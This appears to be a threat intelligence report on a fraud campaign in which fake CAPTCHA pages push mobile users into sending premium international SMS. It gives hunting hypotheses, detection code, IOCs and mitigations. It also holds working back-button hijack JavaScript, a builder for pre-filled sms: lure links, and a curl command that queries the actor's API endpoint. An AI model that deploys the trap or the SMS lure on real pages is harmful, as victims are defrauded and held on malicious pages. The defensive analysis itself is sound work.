Hold the Phone! International Revenue Share Fraud Driven by Fake CAPTCHAs

Threat actors are using Traffic Distribution Systems (TDS) to steer mobile users to fake CAPTCHA pages that trick them into sending premium-rate international SMS messages. This International Revenue Share Fraud (IRSF) scheme combines social engineering with back button hijacking to extract multiple SMS messages per victim, each of which incurs international termination charges.

Confidence: high · Analyzed: 2026-04-23

Authors: David Brunsdon, Darby Wise, Infoblox Threat Intel

Actors: Click2SMS Affiliate Network, SMS Scam Actor

Source: Infoblox

Key Takeaways

  • Fake CAPTCHAs are being weaponized to trick mobile users into sending premium international SMS messages.
  • The campaign leverages Traffic Distribution Systems (TDS) to route victims to fraudulent landing pages.
  • A single interaction can generate up to 60 SMS messages to over 50 international destinations, causing significant financial loss.
  • Attackers use back button hijacking via JavaScript to trap users on the malicious pages.
  • The operation exploits the Click2SMS affiliate marketing model and targets both individuals and telecom carriers.

Affected Systems

  • iOS
  • Android
  • Mobile Devices

Attack Chain

Victims are redirected via a Traffic Distribution System (TDS) to a fake CAPTCHA page after visiting a typosquatted domain. The malicious page uses social engineering to prompt the user to 'verify they are human' by clicking a button, which triggers the device's SMS application. The app is pre-filled with a message and multiple premium international phone numbers. If the user sends the message, they incur high termination fees, a portion of which is shared with the threat actor.
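The hand-off to the SMS app described above, as an added example that is not code from the Infoblox report. It assumes the fake CAPTCHA button carries an sms: URI (RFC 5724), the standard way a web page pre-fills recipients and a message body; the report summary does not name the mechanism. The phone numbers are constructed placeholders that only reuse two of the country codes the report names (+994, +20); the body text is the origSms value visible in the report's API URL.

```javascript
// Added example, not code from the Infoblox report. Assumes the fake CAPTCHA
// hands off to the SMS app with an sms: URI (RFC 5724). Recipients below are
// constructed placeholders, not IOCs.

// Build the link a malicious "verify you are human" button would carry:
// comma-separated recipients, message body in the query string.
function buildSmsUri(recipients, body) {
  return 'sms:' + recipients.join(',') + '?body=' + encodeURIComponent(body);
}

// Parse an sms: URI back into recipients and body; null if it is not sms:.
function parseSmsUri(uri) {
  const m = /^sms:([^?]*)(?:\?(.*))?$/i.exec(uri.trim());
  if (!m) return null;
  const recipients = m[1].split(',').map(r => r.trim()).filter(Boolean);
  const body = new URLSearchParams(m[2] || '').get('body') || '';
  return { recipients, body };
}

// Triage rule for a page scraper or MTD hook: the victim has one home country
// code; fan-out to several recipients outside it, with a body the user never
// typed, is the IRSF pattern described in the attack chain.
function assessSmsLink(uri, homeCountryCode) {
  const parsed = parseSmsUri(uri);
  if (!parsed) return { suspicious: false, reasons: [], recipients: [] };
  const reasons = [];
  const foreign = parsed.recipients.filter(
    r => r.startsWith('+') && !r.startsWith(homeCountryCode));
  if (parsed.recipients.length > 1) reasons.push(`fan-out to ${parsed.recipients.length} recipients`);
  if (foreign.length > 0) reasons.push(`foreign recipients: ${foreign.join(' ')}`);
  if (parsed.body.length > 0) reasons.push(`pre-filled body "${parsed.body}"`);
  return {
    suspicious: foreign.length > 0 && reasons.length >= 2,
    reasons,
    recipients: parsed.recipients,
  };
}

// Constructed demo link: two foreign recipients, body taken from the origSms
// parameter in the report's API URL.
const DEMO_RECIPIENTS = ['+994000000001', '+20000000002'];
const DEMO_SMS_URI = buildSmsUri(DEMO_RECIPIENTS, 'I want to continue 5002320649344849');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(DEMO_SMS_URI);
  console.log(assessSmsLink(DEMO_SMS_URI, '+1'));
}
```

The same parser can be pointed at the `href` of every anchor on a suspect landing page; a single link that fans out to many international numbers with a pre-filled body is the artifact to capture, and the recipient list is what a carrier fraud team needs.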

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules, but shares IOCs and behavioral patterns for hunting.

Detection Engineering Assessment

  • EDR Visibility: Low. The attack runs inside mobile web browsers and native SMS applications, where standard enterprise EDR has limited visibility.
  • Network Visibility: Medium. DNS requests to known TDS and fake CAPTCHA domains can be monitored on corporate networks, but the SMS messages themselves travel over the cellular network.
  • Detection Difficulty: Hard. The attack relies on user interaction on mobile devices, often outside the corporate network perimeter, and blends with legitimate SMS traffic.

Required Log Sources

  • DNS Logs
  • Web Proxy Logs
  • Mobile Device Management (MDM) Logs

Hunting Hypotheses

  • Hypothesis: Search web proxy and DNS logs for connections to known TDS domains or to domains hosted on AS15699, the ASN associated with this campaign.
    • Telemetry: DNS Logs, Web Proxy Logs
    • ATT&CK Stage: Delivery
    • FP Risk: Low
  • Hypothesis: Monitor for unusual spikes in international SMS messaging from corporate-managed mobile devices, particularly to high-risk country codes such as +994, +31, or +20.
    • Telemetry: MDM Logs, Carrier Billing Reports
    • ATT&CK Stage: Execution
    • FP Risk: Medium
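The first hypothesis as runnable hunt logic, added here as an example and not part of the Infoblox report. The domain list is the report's own IOC list; the proxy log format (timestamp, client, method, URL) and the log lines are constructed for this example, and the ASN side of the hypothesis (AS15699) is left out because it needs an external lookup. Beyond the exact IOC match, the hunt also scores URLs carrying two or more of the affiliate tracking keys seen in the campaign's redirect chain, which keeps working after the actor rotates domains.

```javascript
// Added example, not part of the Infoblox report. Domains are the report's
// IOCs; the log format and log lines are constructed for this example.

const IOC_DOMAINS = new Set([
  'd.fufecarrol.top', 'd.herbosfinx.com', 'd.marraheltin.com', 'd.panzozerrot.com',
  'd.remotesbuffalo.top', 'd.santafebuno.top', 'd.vistertransit.com', 'd.zerrotmamil.com',
  'r.buffalosolpe.top', 'r.carrolvassin.top', 'r.transitcaxip.com',
  'claimandwins.com', '4lifetips.com', 'verifysuper.com',
  'chat.matchnewtoday.com', 'vids.chatorizon.com', 'd.ruelomamuy.com',
]);

// Query keys that recur in the campaign's affiliate redirect chain.
const AFFILIATE_KEYS = ['utm_campaign', 'productId', 'aff_sub4', 'aff_sub5', 'caf', 'groupds'];

// True if the host, or any parent domain of it, is in the IOC set.
function hostMatchesIoc(host) {
  const labels = host.toLowerCase().split('.');
  for (let i = 0; i < labels.length - 1; i++) {
    if (IOC_DOMAINS.has(labels.slice(i).join('.'))) return true;
  }
  return false;
}

// Constructed proxy log line: "<ISO time> <client> <method> <url>".
function parseProxyLine(line) {
  const [ts, client, method, url] = line.trim().split(/\s+/);
  return { ts, client, method, url };
}

// Score each line: an IOC domain hit, or two or more affiliate tracking keys
// in one URL (the behavioural indicator that survives domain rotation).
function huntProxyLog(lines) {
  const hits = [];
  for (const line of lines) {
    const ev = parseProxyLine(line);
    let u;
    try { u = new URL(ev.url); } catch { continue; }   // skip unparsable URLs
    const reasons = [];
    if (hostMatchesIoc(u.hostname)) reasons.push('ioc-domain');
    const keys = AFFILIATE_KEYS.filter(k => u.searchParams.has(k));
    if (keys.length >= 2) reasons.push('affiliate-params:' + keys.join(','));
    if (reasons.length > 0) hits.push({ ...ev, host: u.hostname, reasons });
  }
  return hits;
}

// Rebuild each client's redirect chain (hosts in time order) from the hits,
// so an analyst sees TDS -> offer -> lander rather than isolated alerts.
function chainsByClient(hits) {
  const chains = new Map();
  for (const h of [...hits].sort((a, b) => a.ts.localeCompare(b.ts))) {
    if (!chains.has(h.client)) chains.set(h.client, []);
    chains.get(h.client).push(h.host);
  }
  return chains;
}

// Constructed sample log: one victim walking the chain, one benign client
// with a single marketing parameter, one rotated lander, one garbage line.
const SAMPLE_PROXY_LOG = [
  '2026-04-20T10:00:01Z 10.1.2.3 GET https://verifysuper.com/cl/i/wopmej?aff_sub4=5002320649344849&aff_sub5=US',
  '2026-04-20T10:00:02Z 10.1.2.3 GET https://d.ruelomamuy.com/makeTrackerDownload.php?a=WEBSMS&c=US&groupds=138&caf=5002320649344849&step=9',
  '2026-04-20T10:00:03Z 10.1.2.3 GET https://d.fufecarrol.top/',
  '2026-04-20T10:00:04Z 10.1.2.9 GET https://www.example.com/blog?utm_campaign=spring',
  '2026-04-20T10:00:05Z 10.1.2.9 GET https://rotated-lander.example/?utm_campaign=x&productId=42',
  '2026-04-20T10:00:06Z 10.1.2.9 GET not-a-url',
];

if (typeof require !== 'undefined' && require.main === module) {
  const hits = huntProxyLog(SAMPLE_PROXY_LOG);
  for (const h of hits) console.log(h.ts, h.client, h.host, h.reasons.join(' '));
  for (const [client, chain] of chainsByClient(hits)) console.log(client, chain.join(' -> '));
}
```

The single-key benign line (`utm_campaign=spring`) is deliberately not flagged: one marketing parameter is everywhere, and the low FP risk the hypothesis claims holds only for the exact-domain match, so the parameter rule is scored separately and should be reviewed rather than auto-blocked.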

Control Gaps

  • Mobile endpoint visibility
  • SMS content inspection
  • Carrier-level fraud filtering

Key Behavioral Indicators

  • Browser history manipulation (pushState loops)
  • Redirection chains involving multiple affiliate tracking parameters (e.g., utm_campaign, productId)
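The "pushState loop" indicator listed above, as an added example that is not code from the Infoblox report. It shows the back-button hijack the way a malicious page would run it, together with a constructed stand-in for the parts of `window` the trap touches, so the behaviour can be exercised outside a browser; in a real page the first argument to `installHistoryTrap` would simply be `window`. The page URL in the simulation is a constructed placeholder, not an IOC.

```javascript
// Added example, not from the Infoblox report. The trap is the pushState
// loop the indicator refers to; makeFakeWindow is a constructed test stand-in
// for the browser, and the URL used in the simulation is a placeholder.

// The trap: pad history with entries that all point at the current page, and
// re-pad every time the user consumes one with Back, so Back never leaves.
function installHistoryTrap(win, depth) {
  const pad = () => {
    for (let i = 0; i < depth; i++) {
      win.history.pushState({ trap: i }, '', win.location.href);
    }
  };
  pad();                                   // on load
  win.addEventListener('popstate', pad);   // and after every Back press
}

// Constructed stand-in for window: a history stack that fires popstate on
// back(), truncates forward entries on pushState as browsers do, and exposes
// its length so the growth can be measured.
function makeFakeWindow(href) {
  const entries = [href];
  const popstateHandlers = [];
  let index = 0;
  return {
    location: { href },
    history: {
      pushState(_state, _unused, url) {
        entries.splice(index + 1);          // drop forward history
        entries.push(url);
        index = entries.length - 1;
      },
      back() {
        if (index === 0) return null;       // nothing behind us: the user has left the page
        index -= 1;
        for (const fn of popstateHandlers) fn({ type: 'popstate' });
        return entries[index];
      },
      get length() { return entries.length; },
    },
    addEventListener(type, fn) { if (type === 'popstate') popstateHandlers.push(fn); },
  };
}

// Press Back `presses` times on a trapped or untrapped page and report where
// the user landed and how large history became. Untrapped, the first press
// leaves the page. Trapped, every press lands on the same URL and history
// grows by depth - 1 entries per press: a pushState rate with no navigation
// behind it is the thing to alert on.
function simulateBackPresses(trapped, depth, presses) {
  const url = 'https://fake-captcha.example/verify';   // constructed placeholder
  const win = makeFakeWindow(url);
  if (trapped) installHistoryTrap(win, depth);
  const landedOn = [];
  for (let i = 0; i < presses; i++) landedOn.push(win.history.back());
  return {
    landedOn,
    historyLength: win.history.length,
    stillOnPage: landedOn.every(u => u === url),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('trapped:', simulateBackPresses(true, 3, 5));
  console.log('untrapped:', simulateBackPresses(false, 3, 5));
}
```

This is why the awareness guidance below says to close the tab rather than keep pressing Back: each press feeds the popstate handler, which re-pads the stack, and the user cannot win that race by hand.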

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Block known IOC domains and IPs at the corporate firewall and DNS resolvers.

Infrastructure Hardening

  • Implement strict mobile device policies restricting international SMS capabilities for corporate devices if not required for business operations.

User Protection

  • Deploy Mobile Threat Defense (MTD) solutions to block access to known malicious URLs and TDS networks.

Security Awareness

  • Educate users to never send SMS messages to verify their identity on CAPTCHA pages.
  • Train employees to recognize back-button hijacking and to close the browser tab instead of repeatedly attempting to go back.

MITRE ATT&CK Mapping

  • T1204.001 - User Execution: Malicious Link
  • T1566 - Phishing
  • T1643 - Generate Traffic from Victim (Mobile ATT&CK; covers premium-rate SMS toll fraud)

Additional IOCs

  • Domains:
    • d[.]fufecarrol[.]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • d[.]herbosfinx[.]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • d[.]marraheltin[.]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • d[.]panzozerrot[.]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • d[.]remotesbuffalo[.]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • d[.]santafebuno[.]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • d[.]vistertransit[.]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • d[.]zerrotmamil[.]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • r[.]buffalosolpe[.]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • r[.]carrolvassin[.]top - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • r[.]transitcaxip[.]com - SMS actor-controlled domain hosting fake CAPTCHA pages.
    • claimandwins[.]com - Domain hosting older versions of the fake CAPTCHA/download pages.
    • 4lifetips[.]com - Domain hosting older versions of the fake CAPTCHA/download pages.
    • verifysuper[.]com - externOffer domain hosting fake CAPTCHA pages.
    • chat[.]matchnewtoday[.]com - SMS actor-controlled domain hosting fake chat content.
    • vids[.]chatorizon[.]com - SMS actor-controlled domain hosting fake video content.
  • Urls:
    • hxxps://d[.]ruelomamuy[.]com/makeTrackerDownload.php?a=WEBSMS&s=5002320649344849&c=US&groupds=138&caf=5002320649344849&origSms=I%20want%20to%20continue%205002320649344849&step=9 - API endpoint called by the page's JavaScript to retrieve the phone numbers and SMS message text.
    • hxxps://verifysuper[.]com/cl/i/wopmej?aff_sub4=5002320649344849&aff_sub5=US - externOffer URL used to redirect non-targeted users to alternate fake CAPTCHA pages.
  • Command Lines:
    • Purpose: query the actor's API endpoint for the phone numbers and message served to a victim | Tools: curl, jq | Stage: Execution. The URL is the defanged API endpoint listed above; re-fang it only in an isolated analysis environment.
      curl -s 'hxxps://d[.]ruelomamuy[.]com/makeTrackerDownload.php?a=WEBSMS&s=5002320649344849&c=US&groupds=138&caf=5002320649344849&origSms=I%20want%20to%20continue%205002320649344849&step=9' | jq .
  • Other:
    • AS15699 - Adam EcoTech ASN used to host the fake CAPTCHA pages and related infrastructure.